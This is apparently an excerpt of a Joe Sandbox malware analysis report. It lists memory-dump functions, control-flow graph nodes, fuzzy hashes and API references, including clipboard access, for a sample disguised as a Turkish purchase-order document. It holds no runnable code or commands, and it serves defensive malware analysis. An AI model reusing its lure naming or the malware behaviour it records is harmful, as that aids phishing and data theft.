                                                                                        control_flow_graph 1249 12fca08-12fca38 1250 12fca3f-12fcb1c call 12f41a0 call 12f3cc0 1249->1250 1251 12fca3a 1249->1251 1261 12fcb1e 1250->1261 1262 12fcb23-12fcb44 call 12f5658 1250->1262 1251->1250 1261->1262 1264 12fcb49-12fcb54 1262->1264 1265 12fcb5b-12fcb5f 1264->1265 1266 12fcb56 1264->1266 1267 12fcb64-12fcb6b 1265->1267 1268 12fcb61-12fcb62 1265->1268 1266->1265 1270 12fcb6d 1267->1270 1271 12fcb72-12fcb80 1267->1271 1269 12fcb83-12fcbc7 1268->1269 1275 12fcc2d-12fcc44 1269->1275 1270->1271 1271->1269 1277 12fcbc9-12fcbdf 1275->1277 1278 12fcc46-12fcc6b 1275->1278 1282 12fcc09 1277->1282 1283 12fcbe1-12fcbed 1277->1283 1284 12fcc6d-12fcc82 1278->1284 1285 12fcc83 1278->1285 1288 12fcc0f-12fcc2c 1282->1288 1286 12fcbef-12fcbf5 1283->1286 1287 12fcbf7-12fcbfd 1283->1287 1284->1285 1289 12fcc07 1286->1289 1287->1289 1288->1275 1289->1288
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 9fe9aad5c22f11af94b4d690352324e527b7abba3dca0338361a21ed0996f112
                                                                                        • Instruction ID: 7219dbd58b5f1ab00ec19c74315056cb21f23791e6f3a8bd65e9eb4b529c67ff
                                                                                        • Opcode Fuzzy Hash: 9fe9aad5c22f11af94b4d690352324e527b7abba3dca0338361a21ed0996f112
                                                                                        • Instruction Fuzzy Hash: 4E81B074E10218CFEB14DFAAD884A9DFBF2BF88300F148069E919AB365DB709845CF50
                                                                                        Function 012FCFA9 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1293 12fcfa9-12fcfd8 1294 12fcfdf-12fd0bc call 12f41a0 call 12f3cc0 1293->1294 1295 12fcfda 1293->1295 1305 12fd0be 1294->1305 1306 12fd0c3-12fd0e4 call 12f5658 1294->1306 1295->1294 1305->1306 1308 12fd0e9-12fd0f4 1306->1308 1309 12fd0fb-12fd0ff 1308->1309 1310 12fd0f6 1308->1310 1311 12fd104-12fd10b 1309->1311 1312 12fd101-12fd102 1309->1312 1310->1309 1313 12fd10d 1311->1313 1314 12fd112-12fd120 1311->1314 1315 12fd123-12fd167 1312->1315 1313->1314 1314->1315 1319 12fd1cd-12fd1e4 1315->1319 1321 12fd169-12fd17f 1319->1321 1322 12fd1e6-12fd20b 1319->1322 1326 12fd1a9 1321->1326 1327 12fd181-12fd18d 1321->1327 1329 12fd20d-12fd222 1322->1329 1330 12fd223 1322->1330 1328 12fd1af-12fd1cc 1326->1328 1331 12fd18f-12fd195 1327->1331 1332 12fd197-12fd19d 1327->1332 1328->1319 1329->1330 1333 12fd1a7 1331->1333 1332->1333 1333->1328
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 5063e596809e5d8929e55f154cd3616c38469121976250ad1d4ee95bf51136b5
                                                                                        • Instruction ID: bac76e40ec9da448912aed0d6e06b5b1db3651b1da6e0262d7320ac0f92f4e58
                                                                                        • Opcode Fuzzy Hash: 5063e596809e5d8929e55f154cd3616c38469121976250ad1d4ee95bf51136b5
                                                                                        • Instruction Fuzzy Hash: 2981B574E10218CFEB14DFAAD884A9EFBF2BF88310F148069E519AB365DB709945CF50
                                                                                        Function 012FE988 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78cc6c8551cdc1d674fd9753f468a7c3a0c427d70344a4e5a65ffa909c69da38
                                                                                        • Instruction ID: 218c5f5f280df93375238554eba08e8cfdf8b0a165786a72cdc51025394ddc41
                                                                                        • Opcode Fuzzy Hash: 78cc6c8551cdc1d674fd9753f468a7c3a0c427d70344a4e5a65ffa909c69da38
                                                                                        • Instruction Fuzzy Hash: A1519774E10308DFEB19DFAAD494A9EFBB2BF89300F258129E915AB364DB305941CF54
                                                                                        Function 012FE97B Relevance: .1, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52e95e20998b7a321d14522d7fc0c3f81fbffe3310d47c9d686ec40e8b22bd66
                                                                                        • Instruction ID: 26282e777d9aad67943184d3e330b8222ae3453289d96c8d603e1f80c13528dc
                                                                                        • Opcode Fuzzy Hash: 52e95e20998b7a321d14522d7fc0c3f81fbffe3310d47c9d686ec40e8b22bd66
                                                                                        • Instruction Fuzzy Hash: B851B774E10208DFDB19DFAAD454A9EFBB2BF89300F25C029E915AB365DB305841CF54
                                                                                        Function 012F76F1 Relevance: 10.5, Strings: 8, Instructions: 477COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 12f76f1-12f7725 1 12f772b-12f774e 0->1 2 12f7b54-12f7b58 0->2 11 12f77fc-12f7800 1->11 12 12f7754-12f7761 1->12 3 12f7b5a-12f7b6e 2->3 4 12f7b71-12f7b7f 2->4 9 12f7b81-12f7b96 4->9 10 12f7bf0-12f7c05 4->10 18 12f7b9d-12f7baa 9->18 19 12f7b98-12f7b9b 9->19 20 12f7c0c-12f7c19 10->20 21 12f7c07-12f7c0a 10->21 15 12f7848-12f7851 11->15 16 12f7802-12f7810 11->16 25 12f7763-12f776e 12->25 26 12f7770 12->26 22 12f7c67 15->22 23 12f7857-12f7861 15->23 16->15 30 12f7812-12f782d 16->30 27 12f7bac-12f7bed 18->27 19->27 28 12f7c1b-12f7c56 20->28 21->28 31 12f7c6c-12f7c9c 22->31 23->2 29 12f7867-12f7870 23->29 32 12f7772-12f7774 25->32 26->32 76 12f7c5d-12f7c64 28->76 35 12f787f-12f788b 29->35 36 12f7872-12f7877 29->36 56 12f782f-12f7839 30->56 57 12f783b 30->57 61 12f7c9e-12f7cb4 31->61 62 12f7cb5-12f7cbc 31->62 32->11 39 12f777a-12f77dc 32->39 35->31 37 12f7891-12f7897 35->37 36->35 43 12f7b3e-12f7b42 37->43 44 12f789d-12f78ad 37->44 89 12f77de 39->89 90 12f77e2-12f77f9 39->90 43->22 49 12f7b48-12f7b4e 43->49 58 12f78af-12f78bf 44->58 59 12f78c1-12f78c3 44->59 49->2 49->29 63 12f783d-12f783f 56->63 57->63 64 12f78c6-12f78cc 58->64 59->64 63->15 70 12f7841 63->70 64->43 71 12f78d2-12f78e1 64->71 70->15 73 12f798f-12f79ba call 12f7538 * 2 71->73 74 12f78e7 71->74 91 12f7aa4-12f7abe 73->91 92 12f79c0-12f79c4 73->92 78 12f78ea-12f78fb 74->78 78->31 80 12f7901-12f7913 78->80 80->31 83 12f7919-12f7931 80->83 145 12f7933 call 12f7f3d 83->145 146 12f7933 call 12f7f39 83->146 147 12f7933 call 12f80d8 83->147 148 12f7933 call 12f8055 83->148 149 12f7933 call 12f7f35 83->149 150 12f7933 call 12f7f64 83->150 151 12f7933 call 12f7fa4 83->151 152 12f7933 call 12f7fe4 83->152 153 12f7933 call 12f7f31 83->153 154 12f7933 call 12f7ef0 83->154 85 12f7939-12f7949 85->43 88 12f794f-12f7952 85->88 93 12f795c-12f795f 88->93 94 12f7954-12f795a 88->94 89->90 90->11 91->2 112 12f7ac4-12f7ac8 91->112 92->43 95 12f79ca-12f79ce 92->95 93->22 96 12f7965-12f7968 93->96 94->93 94->96 99 12f79f6-12f79fc 95->99 100 12f79d0-12f79dd 95->100 101 12f796a-12f796e 96->101 102 12f7970-12f7973 96->102 104 12f79fe-12f7a02 99->104 105 12f7a37-12f7a3d 99->105 115 12f79df-12f79ea 100->115 116 12f79ec 100->116 101->102 103 12f7979-12f797d 101->103 102->22 102->103 103->22 110 12f7983-12f7989 103->110 104->105 111 12f7a04-12f7a0d 104->111 107 12f7a3f-12f7a43 105->107 108 12f7a49-12f7a4f 105->108 107->76 107->108 113 12f7a5b-12f7a5d 108->113 114 12f7a51-12f7a55 108->114 110->73 110->78 117 12f7a0f-12f7a14 111->117 118 12f7a1c-12f7a32 111->118 119 12f7aca-12f7ad4 call 12f63e0 112->119 120 12f7b04-12f7b08 112->120 121 12f7a5f-12f7a68 113->121 122 12f7a92-12f7a94 113->122 114->43 114->113 123 12f79ee-12f79f0 115->123 116->123 117->118 118->43 119->120 133 12f7ad6-12f7aeb 119->133 120->76 125 12f7b0e-12f7b12 120->125 128 12f7a6a-12f7a6f 121->128 129 12f7a77-12f7a8d 121->129 122->43 130 12f7a9a-12f7aa1 122->130 123->43 123->99 125->76 131 12f7b18-12f7b25 125->131 128->129 129->43 136 12f7b27-12f7b32 131->136 137 12f7b34 131->137 133->120 142 12f7aed-12f7b02 133->142 139 12f7b36-12f7b38 136->139 137->139 139->43 139->76 142->2 142->120 145->85 146->85 147->85 148->85 149->85 150->85 151->85 152->85 153->85 154->85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                        • API String ID: 0-2212926057
                                                                                        • Opcode ID: 38d6c01db0e8a81120fdbb58ce2f2ea244e8e216b3da815fd62329c18d60243e
                                                                                        • Instruction ID: 4a47fbd47b3de6dfc1d8ec55f6f8703888f2d136374df453a308220656c040c2
                                                                                        • Opcode Fuzzy Hash: 38d6c01db0e8a81120fdbb58ce2f2ea244e8e216b3da815fd62329c18d60243e
                                                                                        • Instruction Fuzzy Hash: E4125830A102099FDB25CF68D984AAEBBF2FF49314F1485A9EA49DB361D730ED45CB50
                                                                                        Function 012F5F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 801 12f5f38-12f5f5a 802 12f5f5c-12f5f60 801->802 803 12f5f70-12f5f7b 801->803 804 12f5f88-12f5f8f 802->804 805 12f5f62-12f5f6e 802->805 806 12f6023-12f604f 803->806 807 12f5f81-12f5f83 803->807 809 12f5faf-12f5fb8 804->809 810 12f5f91-12f5f98 804->810 805->803 805->804 814 12f6056-12f60ae 806->814 808 12f601b-12f6020 807->808 885 12f5fba call 12f5f29 809->885 886 12f5fba call 12f5f38 809->886 810->809 811 12f5f9a-12f5fa5 810->811 813 12f5fab-12f5fad 811->813 811->814 813->808 833 12f60bd-12f60cf 814->833 834 12f60b0-12f60b6 814->834 815 12f5fc0-12f5fc2 816 12f5fca-12f5fd2 815->816 817 12f5fc4-12f5fc8 815->817 820 12f5fd4-12f5fd9 816->820 821 12f5fe1-12f5fe3 816->821 817->816 819 12f5fe5-12f6004 call 12f69a0 817->819 827 12f6019 819->827 828 12f6006-12f600f 819->828 820->821 821->808 827->808 883 12f6011 call 12fafad 828->883 884 12f6011 call 12faf5b 828->884 830 12f6017 830->808 836 12f60d5-12f60d9 833->836 837 12f6163-12f6165 833->837 834->833 838 12f60db-12f60e7 836->838 839 12f60e9-12f60f6 836->839 881 12f6167 call 12f6300 837->881 882 12f6167 call 12f62f0 837->882 847 12f60f8-12f6102 838->847 839->847 840 12f616d-12f6173 841 12f617f-12f6186 840->841 842 12f6175-12f617b 840->842 845 12f617d 842->845 846 12f61e1-12f6240 842->846 845->841 862 12f6247-12f625e 846->862 850 12f612f-12f6133 847->850 851 12f6104-12f6113 847->851 852 12f613f-12f6143 850->852 853 12f6135-12f613b 850->853 859 12f6115-12f611c 851->859 860 12f6123-12f612d 851->860 852->841 858 12f6145-12f6149 852->858 856 12f613d 853->856 857 12f6189-12f61da 853->857 856->841 857->846 861 12f614f-12f6161 858->861 858->862 859->860 860->850 861->841 881->840 882->840 883->830 884->830 885->815 886->815
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hq$Hq
                                                                                        • API String ID: 0-925789375
                                                                                        • Opcode ID: 51849c8bae44aab0de4f302a0a69455c2dee9886d909cabf507e76fe0c95bf04
                                                                                        • Instruction ID: 79e04b80958d236ac62ea4fbf688c1cdcba5d967ad0855cd245abb9efa6038eb
                                                                                        • Opcode Fuzzy Hash: 51849c8bae44aab0de4f302a0a69455c2dee9886d909cabf507e76fe0c95bf04
                                                                                        • Instruction Fuzzy Hash: 4591B0307142068FEB259F389854B6EBBB6FF89300F18856DE6068B396CB748C02C791
                                                                                        Function 012F6498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 946 12f6498-12f64a5 947 12f64ad-12f64af 946->947 948 12f64a7-12f64ab 946->948 949 12f66c0-12f66c7 947->949 948->947 950 12f64b4-12f64bf 948->950 951 12f66c8 950->951 952 12f64c5-12f64cc 950->952 955 12f66cd-12f6705 951->955 953 12f64d2-12f64e1 952->953 954 12f6661-12f6667 952->954 953->955 956 12f64e7-12f64f6 953->956 957 12f666d-12f6671 954->957 958 12f6669-12f666b 954->958 976 12f670e-12f6712 955->976 977 12f6707-12f670c 955->977 964 12f650b-12f650e 956->964 965 12f64f8-12f64fb 956->965 959 12f66be 957->959 960 12f6673-12f6679 957->960 958->949 959->949 960->951 962 12f667b-12f667e 960->962 962->951 966 12f6680-12f6695 962->966 968 12f651a-12f6520 964->968 969 12f6510-12f6513 964->969 967 12f64fd-12f6500 965->967 965->968 985 12f66b9-12f66bc 966->985 986 12f6697-12f669d 966->986 971 12f6506 967->971 972 12f6601-12f6607 967->972 978 12f6538-12f6555 968->978 979 12f6522-12f6528 968->979 973 12f6566-12f656c 969->973 974 12f6515 969->974 982 12f662c-12f6639 971->982 980 12f661f-12f6629 972->980 981 12f6609-12f660f 972->981 983 12f656e-12f6574 973->983 984 12f6584-12f6596 973->984 974->982 987 12f6718-12f671a 976->987 977->987 1018 12f655e-12f6561 978->1018 988 12f652c-12f6536 979->988 989 12f652a 979->989 980->982 990 12f6613-12f661d 981->990 991 12f6611 981->991 1010 12f664d-12f664f 982->1010 1011 12f663b-12f663f 982->1011 993 12f6578-12f6582 983->993 994 12f6576 983->994 1004 12f6598-12f65a4 984->1004 1005 12f65a6-12f65c9 984->1005 985->949 995 12f66af-12f66b2 986->995 996 12f669f-12f66ad 986->996 997 12f672f-12f6736 987->997 998 12f671c-12f672e 987->998 988->978 989->978 990->980 991->980 993->984 994->984 995->951 999 12f66b4-12f66b7 995->999 996->951 996->995 999->985 999->986 1020 12f65f1-12f65ff 1004->1020 1005->951 1023 12f65cf-12f65d2 1005->1023 1014 12f6653-12f6656 1010->1014 1011->1010 1013 12f6641-12f6645 1011->1013 1013->951 1019 12f664b 1013->1019 1014->951 1015 12f6658-12f665b 1014->1015 1015->953 1015->954 1018->982 1019->1014 1020->982 1023->951 1024 12f65d8-12f65ea 1023->1024 1024->1020
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,q$,q
                                                                                        • API String ID: 0-1667412543
                                                                                        • Opcode ID: afa304906c9daf6c5ec52e39ace3c6f1725740d0ce1da82863d5cfdbf06f38fd
                                                                                        • Instruction ID: da20868ee6d23d35cb85fe9559c08615d5f2253227ec58fec8c66efece67a453
                                                                                        • Opcode Fuzzy Hash: afa304906c9daf6c5ec52e39ace3c6f1725740d0ce1da82863d5cfdbf06f38fd
                                                                                        • Instruction Fuzzy Hash: DE816B34A205068FDB24CF6DD488AA9FBB2FF89201F14817DD706AB365DB35E841CB51
                                                                                        Function 012F9C30 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1337 12f9c30-12f9c51 1338 12f9c59-12f9c60 1337->1338 1375 12f9c53 call 12f9c2c 1337->1375 1376 12f9c53 call 12f9c30 1337->1376 1339 12f9c6c-12f9c8c 1338->1339 1340 12f9c62-12f9c67 1338->1340 1343 12f9c8e-12f9c90 1339->1343 1344 12f9cc7-12f9cc9 1339->1344 1341 12f9d35-12f9d3c 1340->1341 1347 12f9c9f-12f9ca6 1343->1347 1348 12f9c92-12f9c97 1343->1348 1345 12f9ccb-12f9cd1 1344->1345 1346 12f9d30 1344->1346 1345->1346 1349 12f9cd3-12f9cee 1345->1349 1346->1341 1350 12f9d3f-12f9d6b call 12f9620 1347->1350 1351 12f9cac-12f9cc5 1347->1351 1348->1347 1356 12f9d25-12f9d27 1349->1356 1357 12f9cf0-12f9cf2 1349->1357 1362 12f9d6d-12f9d77 1350->1362 1363 12f9d79-12f9d82 call 12f9620 1350->1363 1351->1341 1356->1346 1361 12f9d29-12f9d2e 1356->1361 1359 12f9cf4-12f9cf9 1357->1359 1360 12f9d01-12f9d08 1357->1360 1359->1360 1360->1350 1364 12f9d0a-12f9d23 1360->1364 1361->1341 1362->1363 1369 12f9d84-12f9d8e 1363->1369 1370 12f9d90-12f9d99 1363->1370 1364->1341 1369->1370 1371 12f9da4-12f9dcd 1370->1371 1375->1338 1376->1338
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'q$4'q
                                                                                        • API String ID: 0-1467158625
                                                                                        • Opcode ID: 1ac562e5eb9cc4c82b784e02e2066699f85d46f4251f649af90e08760586b868
                                                                                        • Instruction ID: 9bf9b5e05f3151c12712fe5127a1d96d780ecfd0e89e2a99e7f829286b9210b8
                                                                                        • Opcode Fuzzy Hash: 1ac562e5eb9cc4c82b784e02e2066699f85d46f4251f649af90e08760586b868
                                                                                        • Instruction Fuzzy Hash: 905182307102459FDB15DF69C844B6ABBE6EF89314F148479FA09CB295D771CC42CB91
                                                                                        Function 012F3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1414 12f3cc0-12f3cd9 1416 12f3cdb-12f3cdd 1414->1416 1417 12f3cea-12f3cf2 1414->1417 1418 12f3cdf-12f3ce1 1416->1418 1419 12f3ce3-12f3ce8 1416->1419 1420 12f3cf4-12f3d02 1417->1420 1418->1420 1419->1420 1423 12f3d18-12f3d20 1420->1423 1424 12f3d04-12f3d06 1420->1424 1427 12f3d23-12f3d26 1423->1427 1425 12f3d0f-12f3d16 1424->1425 1426 12f3d08-12f3d0d 1424->1426 1425->1427 1426->1427 1429 12f3d3d-12f3d41 1427->1429 1430 12f3d28-12f3d36 1427->1430 1431 12f3d5a-12f3d5d 1429->1431 1432 12f3d43-12f3d51 1429->1432 1430->1429 1436 12f3d38 1430->1436 1434 12f3d5f-12f3d63 1431->1434 1435 12f3d65-12f3d9a 1431->1435 1432->1431 1442 12f3d53 1432->1442 1434->1435 1438 12f3d9c-12f3db3 1434->1438 1443 12f3dfc-12f3e01 1435->1443 1436->1429 1440 12f3db9-12f3dc5 1438->1440 1441 12f3db5-12f3db7 1438->1441 1444 12f3dcf-12f3dd9 1440->1444 1445 12f3dc7-12f3dcd 1440->1445 1441->1443 1442->1431 1447 12f3de1 1444->1447 1448 12f3ddb 1444->1448 1445->1447 1450 12f3de9-12f3df5 1447->1450 1448->1447 1450->1443
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Xq$Xq
                                                                                        • API String ID: 0-1556399337
                                                                                        • Opcode ID: bc9103043a5b4258feed9d4e520ca96866461791b1f13cd07617f210bbc0f960
                                                                                        • Instruction ID: 5d7d33ce05dbe864eb2ee8fbc36c4e6d2d7c138caee48600ade3136c4abd2262
                                                                                        • Opcode Fuzzy Hash: bc9103043a5b4258feed9d4e520ca96866461791b1f13cd07617f210bbc0f960
                                                                                        • Instruction Fuzzy Hash: 4731C631B2032647EF29967A989537EE9AABBC4241F18403DDB16C73C4DBB5CC45C7A1
                                                                                        Function 012F8EF8 Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $q$$q
                                                                                        • API String ID: 0-3126353813
                                                                                        • Opcode ID: c608d4b9605e5b8523015641cc1e4c5f0bf6168cae6e9fd3a2d3cd8469d4aca5
                                                                                        • Instruction ID: b16d8f9aa4227172baf9da82d44bf135711ba9802cab76fd696548026a3fe5a3
                                                                                        • Opcode Fuzzy Hash: c608d4b9605e5b8523015641cc1e4c5f0bf6168cae6e9fd3a2d3cd8469d4aca5
                                                                                        • Instruction Fuzzy Hash: 2731B4303242528FDB364B69D85463EFB6AAF85710F69067EF346CB252DA25CC418791
                                                                                        Function 012F0C93 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LRq
                                                                                        • API String ID: 0-3187445251
                                                                                        • Opcode ID: d1d9370361369274771103ece6e8b73b6a3b89e79995c292457e5aa0bdcbf1ad
                                                                                        • Instruction ID: 59645503a394e3e8db69dcf498cdeed680a53386c843f16a83d704ef1f25a267
                                                                                        • Opcode Fuzzy Hash: d1d9370361369274771103ece6e8b73b6a3b89e79995c292457e5aa0bdcbf1ad
                                                                                        • Instruction Fuzzy Hash: 30529C7890022ACFCB64EF65ED94B9DBBB6FB48301F1046A9E509AB359DB306D45CF40
                                                                                        Function 012F0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LRq
                                                                                        • API String ID: 0-3187445251
                                                                                        • Opcode ID: 7838fcbe6b55f1ab6bd429715d45290adc662f6945c24261e41d646c02c8122b
                                                                                        • Instruction ID: 08ad94ef645af66554627bcb65363e7560335b8faa2498804b9fe5dff998a1b1
                                                                                        • Opcode Fuzzy Hash: 7838fcbe6b55f1ab6bd429715d45290adc662f6945c24261e41d646c02c8122b
                                                                                        • Instruction Fuzzy Hash: 0B529C7890022ACFCB64EF65ED94B9DBBB6FB48301F1046A9E509AB359DB306D45CF40
                                                                                        Function 06C4C41C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: 0c06c5b58adadc532b5fca2f792311590ce47489e813cfd215e9e63dd82e7fc8
                                                                                        • Instruction ID: 7598355c28d2a825289be5e0ff1458047251075bd75a969368ed3cc60e01088a
                                                                                        • Opcode Fuzzy Hash: 0c06c5b58adadc532b5fca2f792311590ce47489e813cfd215e9e63dd82e7fc8
                                                                                        • Instruction Fuzzy Hash: B73116B0D01348DFDB24DF99C544B9DBBF1BF48304F208069E405BB2A0DB75A945CBA5
                                                                                        Function 06C4C90D Relevance: 1.6, APIs: 1, Instructions: 73comclipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6c40000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: be4ab02c2c762d8c818f0541ee175885ef7c6b71fa205c750701b093cf9aa92f
                                                                                        • Instruction ID: 2e4213a98014add2f362b82be024247267e2cbe2b43cb2d0f29b16bf0e01892f
                                                                                        • Opcode Fuzzy Hash: be4ab02c2c762d8c818f0541ee175885ef7c6b71fa205c750701b093cf9aa92f
                                                                                        • Instruction Fuzzy Hash: E83103B0D02249DFDB24DF99C944BDDBBF1BF48304F208069E404BB290DBB5A945CBA5
                                                                                        Function 06C49C24 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06C4B2F7), ref: 06C4BD7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3720215962.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
